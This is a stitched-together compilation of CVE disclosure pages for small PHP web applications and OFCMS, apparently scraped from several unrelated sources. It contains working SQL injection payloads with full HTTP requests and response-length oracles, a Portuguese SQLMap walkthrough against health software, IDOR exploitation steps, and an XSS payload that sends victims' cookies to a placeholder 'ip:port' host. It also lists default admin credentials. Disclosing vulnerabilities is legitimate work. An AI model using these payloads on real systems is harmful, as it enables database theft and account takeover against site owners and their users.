School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:125

Submitted by oretnom23 on Saturday, May 7, 2022 - 16:08.

****Introduction****

This project is entitled **School Dormitory Management System**. This is a web-based application project developed in **PHP** and **MySQL Database**. This project provides an online and automated platform for **Universities or Colleges' Dormitory** to manage their monthly collections and records. The system consist consists of multiple features that include the student dorm accounts. The application was developed with **Bootstrap Framework** and **AdminLTE Template**. It consists of user-friendly features and functionalities.

****About the School Dormitory Management System****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Font Awesome**
*   **AdminLTE**

This **School Dormitory Management System** can be only accessed by the management. The system features and functionalities can be accessed only by the registered system users. The system users have 2 types of roles which are the **Administrator** and **Staff**. Both Users must log in with their system credentials to gain access to the features and functionalities of the application. The **Administrator Users** have the privilege to access and manage all the features and functionalities of the system while **Staff Users** have only limited permissions.

This Dormitory Management System allows the management to manage the list of dormitory buildings, rooms in each dorm, and student accounts. The management must populate first the list of dorms, rooms, and students when using the system for the first time. Users create an account for a student and assign them to a room with an available slot. The student that has an active account will be automatically removed from the student options when creating an account. Also, the room option in the account registry only lists the rooms that have available slots.

The system was developed with user-friendly features and functionalities with CRUD (Create, Read, Update, and Delete) Operations. It can help the school management to efficiently and effectively manage the dorms' collections and account records.

****Features****

*   **Home Page**
    *   Display the summary.
*   **Dorm Management**
    *   Add New Dorm
    *   List All Courts
    *   View Dorm Details
    *   Update Dorm Details
    *   Delete Dorm
*   **Room Management**
    *   Add New Room
    *   List All Rooms
    *   View Room Details
    *   Update Room Details
    *   Delete Room
*   **Student Management**
    *   Add New Student
    *   List All Students
    *   View Student Details
    *   Update Student Details
    *   Delete Student
*   **Account Management**
    *   Add New Account
    *   List All Accounts
    *   View Account Details
    *   Update Account Details
    *   Add Payment
    *   List Payment History
    *   Edit Payment Details
    *   Delete Payment Details
    *   Delete Account
*   **Report**
    *   Generate Printable Monthly Collection Report
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Delete User Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Dashboard****

****Dorm List****

****Room List****

****Student Details Page****

****Account Details Page****

****Payment History Modal****

****Monthly Collection Report****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****dms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****dms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **School Dormitory Management System** in a **browser**. i.e. ****http://localhost/dms/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **School Dormitory Management System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   2369 views

CVE-2022-30513: School Dormitory Management System in PHP/OOP Free Source Code

SQL injection in Logon Page of IDCE MV's application, version 1.0, allows an attacker to inject SQL payloads in the user field, connecting to a database to access enterprise's private and sensitive information.

Olá!

Neste artigo eu comprovo a falha de SQL Injection no software de gestão de saúde IDCE da empresa MV Informática para a base do CVE-2022-30496.

Embora o software seja de uma versão antiga, lançada há alguns anos atrás, algumas empresas brasileiras de saúde ainda o utilizam em larga escala. A maioria das empresas o tem rodando apenas em redes locais ou protegidos por VPN. Porém ainda é possível encontrar este software vulnerável sendo utilizado abertamente através da internet e sem nenhuma proteção extra.

Aproveito para informar que a ação de coletar informações de serviços não é caracterizado crime, uma vez que foi utilizado um ambiente controlado de teste e nenhuma informação privada foi revelada. Esta matéria tem como fins apresentar os métodos utilizados por hackers para encontrar informações de empresas e apresentar aos desenvolvedores as falhas de segurança que suas aplicações web (portais, sites de atendimento, etc) possuem. Corrigir ou não é uma decisão dos desenvolvedores e gestores/clientes destas aplicações.

Por Iran Macedo, especialista em proteção de dados e segurança ofensiva / Pentest.

**A falha de SQLi**

O software testado foi o IDCE - MV Medicina Diagnóstica. Este software é utilizado por hospitais e seus médicos para gerarem laudos de exames médicos de pacientes. Mas não somente isso, pois pode controlar fluxo de pagamentos, gerenciar usuários, suas informações e permissões, dados de parceiros, de fornecedores e de clientes (pacientes) e outros serviços gerenciais relativos aos hospitais e clínicas.

Realizando o teste mais básico de SQL Injection, não conseguimos nada. Por exemplo, ao adicionar uma aspas simples ' no campo usuário, temos a resposta "Usuário e/ou Senha inválidos!", o que parece ser um bom sinal, uma vez que a aplicação parece tratar a entrada enviada pelo usuário antes de envia-la ao banco de dados.

**Time-Based Blind injection**

Para iniciar meus testes, fiz o envio de um usuário e senha inválidos, interceptei pelo Burp, copiei os dados de requisição e salvei num arquivo TXT, que foi utilizado pelo SQLMap como base da requisição através do parâmetro "-r".

Num teste anterior em um outro produto do desenvolvedor MV, vimos que o banco de dados utilizado era um Oracle. Desta forma as chances do desenvolvedor utilizar na epoca o Oracle como a solução de banco de dados para todas as suas aplicações é grande. Partindo deste princípio, configurei o meu SQLMap para testar todas os possíveis ataques (level 5 e risk 3) somente para banco Oracle nesta aplicação. Isso reduz a quantidade e o tempo de execução dos testes.

Como resultado, o campo testado (Usuário) pareceu ser vulnerável a um ataque de SQL Injection em Oracle e Time-Based Blind.

Ao final dos testes o SQLMap trouxe a confirmação da falha de segurança da aplicação, evidenciando o banco de dados encontrado (Oracle), a versão e o sistema operacional do servidor do banco de dados (Windows 2008 R2) e outras informações. Isto já é suficiente para comprovar a falha de segurança na aplicação.

Para ser mais conclusivo, outros dados não sensíveis foram capturados, como por exemplo o usuário utilizado pelo banco de dados e a base atualmente acessada.

E, para evidenciar que seria possível acessar todas as informações dentro desta base, pegamos os nomes das colunas de uma dada tabela utilizada pela aplicação IDCE.

Estas evidências são suficientes para comprovar a falha de segurança da aplicação, que acaba expondo as informações dentro do seu banco de dados.

Por ser um falha baseada em tempo de resposta às cegas (Time-Based Blind), este tipo de ataque pode levar muito tempo para ser executado.

**Correção da falha** _(informação atualizada)_

Conversando por vídeo conferência com o desenvolvedor em maio de 2020 e em junho de 2022, fui informado de que a MV Informática corrigiu as falhas apresentadas nesta versão testada. Desta forma, é recomendado que a solução de medicina diagnóstica IDCE seja utilizada sempre de forma atualizada. Infelizmente algumas empresas ainda utilizam versões desatualizadas e vulneráveis.

**Conclusão**

Mantenha o seu software atualizado e sempre utilize as versões mais atuais e estáveis. Utilizar softwares piratas pode parecer como uma solução viável e barata para quem não quer gastar dinheiro pagando por programas licenciados. Mas lembre-se de que isto não é legal (no termo jurídico da palavra), além de não ter as atualizações necessárias para mantê-lo seguro. O "barato" pode acabar saindo muito, mas muito mais caro do que pagar por softwares licenciados. Visto que uma multa aplicada por processos judiciais de clientes afetados através da LGPD não é nada barato, sem dizer dos riscos de se ter o banco de dados principal invadido.

Mantenha-se seguro e um grande abraço!

Documentação formal do CVE na Mitre: MeuGithub

CVE ID: CVE-2022-30496.

CVE-2022-30496: SQL Injection no IDCE MV

Online Ordering System 1.0 by oretnom23 is vulnerable to SQL Injection via admin/vieworders.php.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/admin/vieworders.php

Vulnerability location: /onlineordering/admin/vieworders.php?id=,id

\[+\] Payload: /onlineordering/admin/vieworders.php?id=MM-MDE%27%20and%20length(database())%20=12--+ // Leak place ---> id

Current database name: shoppingcart,length is 12

GET /onlineordering/admin/vieworders.php?id\=MM\-MDE%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v112m4jpgqqtdo86av7lvbjv3l
Connection: close

When length (database (()) = 11, Content-Length: 791

When length (database (()) = 12, Content-Length: 1065

CVE-2022-30797: bug_report/SQLi-3.md at main · k0xx11/bug_report

Online Ordering System v1.0 by oretnom23 is vulnerable to SQL Injection via admin/editproductimage.php.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/admin/editproductimage.php

Vulnerability location: /onlineordering/admin/editproductimage.php?id=,id

\[+\] Payload: /onlineordering/admin/editproductimage.php?id=19%27%20and%20length(database())%20=12--+ // Leak place ---> id

Current database name: shoppingcart,length is 12

GET /onlineordering/admin/editproductimage.php?id\=19%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v112m4jpgqqtdo86av7lvbjv3l
Connection: close

When length (database (()) = 11, Content-Length: 449

When length (database (()) = 12, Content-Length: 313

CVE-2022-30795: bug_report/SQLi-4.md at main · k0xx11/bug_report

Online Ordering System v1.0 by oretnom23 is vulnerable to SQL Injection via admin/viewreport.php.

Permalink

**Online Ordering System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/admin/viewreport.php

Vulnerability location: /onlineordering/admin/viewreport.php?id=,id

\[+\] Payload: /onlineordering/admin/viewreport.php?id=TKE-KMS%27%20and%20length(database())%20=12--+ // Leak place ---> id

Current database name: shoppingcart,length is 12

GET /onlineordering/admin/viewreport.php?id\=TKE\-KMS%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v112m4jpgqqtdo86av7lvbjv3l
Connection: close

When length (database ()) = 11, Content-Length: 1025

When length (database ()) = 12, Content-Length: 1486

CVE-2022-30798: bug_report/SQLi-2.md at main · k0xx11/bug_report

Online Ordering System v1.0 by oretnom23 is vulnerable to SQL Injection via admin/editproductetails.php.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/admin/editproductetails.php

Vulnerability location: /onlineordering/admin/editproductetails.php?id=, id

\[+\] Payload: ip/onlineordering/admin/editproductetails.php?id=12%27%20union%20select%201,2,database(),4,5--+

GET /onlineordering/admin/editproductetails.php?id\=12%27%20union%20select%201,2,database(),4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close

CVE-2022-30794: bug_report/SQLi-1.md at main · k0xx11/bug_report

Online Ordering System v1.0 by oretnom23 has SQL injection via store/orderpage.php.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin

vendors: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html

Vulnerability File: /onlineordering/store/orderpage.php

Vulnerability location: /onlineordering/store/orderpage.php?id=,id

\[+\] Payload: /onlineordering/store/orderpage.php?id=12%27%20and%20length(database())%20=12--+ // Leak place ---> id

Current database name: shoppingcart,length is 12

GET /onlineordering/store/orderpage.php?id\=12%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v112m4jpgqqtdo86av7lvbjv3l
Connection: close

When length (database (()) = 11, Content-Length: 3541

When length (database (()) = 12, Content-Length: 2529

CVE-2022-30799: bug_report/SQLi-5.md at main · k0xx11/bug_report

An insecure direct object reference (IDOR) in Online Market Place Site v1.0 allows attackers to modify products that are owned by other sellers.

**Exploit Title: Online Market Place Site v1.0 - Insecure Direct Object Reference(IDOR)****Exploit Author: NS Kumar (n1\_x)****Date: April 17, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Online Market Place v1.0 suffers from IDOR - Broken Access Control Vulnerability allowing attackers to modify the product that owned by other sellers(vertical privilege escalation).**

\---------------------------------------- To Exploit ---------------------------------------------------------

Step 1: Register and login as a seller.

Step 2: Goto product page click action and select edit product, you can see url like http://localhost/omps/seller/?page=products/view\_details&id=4

Step 3: The id parameter is the vulnerable to insecure direct object reference(idor).

step 4: change the product id that not listed in your product page.

step 5: Now You can edit the product of other sellers.

CVE-2022-29627: OpenSource/exploit_idor.md at main · nsparker1337/OpenSource

A cross-site scripting (XSS) vulnerability in /omps/seller of Online Market Place Site v1.0 allows attackers to execute arbitrary web cripts or HTML via a crafted payload injected into the Page parameter.

**Exploit Title: Online Market Place Site v1.0 - XSS and CSRF****Date: April 17, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Online Market Place v1.0 suffers from Cross Site Scripting and Cross Site Request Forgery Vulnerability that allowing attackers to steal the cookies of other users(possible account takeover).**

\---------------------------------------- To Exploit ---------------------------------------------------------

Step 1: Register and login as a seller.

Step 2: Goto product page click action and select view product, you can see url like http://localhost/omps/seller/?page=products/view\_details&id=4

Step 3: The page parameter is the vulnerable to cross site scripting because it's not sanitizing the user input.

step 4: put the payload  and you will see the pop window that reflects 1337.

step 5: Now attacker can send malicious url to other user then perfom csrf and finally takeover their account.

For stealing the cookies : <img src='x' onerror=this.src=http://ip:port/?'+document.cookie;>

Final Payload : http://localhost/omps/seller/?page=<img src='x' onerror=this.src=http://ip:port/?'+document.cookie;>&id=4

CVE-2022-29628: OpenSource/exploit_rxss.md at main · nsparker1337/OpenSource

OFCMS v1.1.4 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/comn/service/update.json.

\[Suggested description\]  
There are many cross-site scripting vulnerabilities in the background of OFCMS system version 1.1.4, because the special characters entered are not effectively escaped.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

    POST /ofcms/admin/comn/service/update.json?sqlid=system.role.update HTTP/1.1
    Host: localhost:7000
    Content-Length: 94
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://localhost:7000
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:7000/ofcms/admin/f.html?p=system/role/edit.html&role_id=3&_fsUuid=820e45c9-7f52-4e8d-b917-930c4b13153c
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=A81B589572EF210191B7C30F017A814D
    Connection: close
    
    role_id=3&role_name=%24%7B2*2%7D&role_desc=Test+freemarker+%3Cscript%3Ealert(1)%3C%2Fscript%3E
    

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability to prove\]  
Case 1:  
/ofcms/admin/comn/service/update.json?sqlid=system.menu.update  
  
  

Case 2:  
/ofcms/admin/comn/service/update.json?sqlid=cms.bbs.update  
  
  

Case 3:  
/ofcms/admin/comn/service/update.json?sqlid=cms.ad.update

Tag

#sql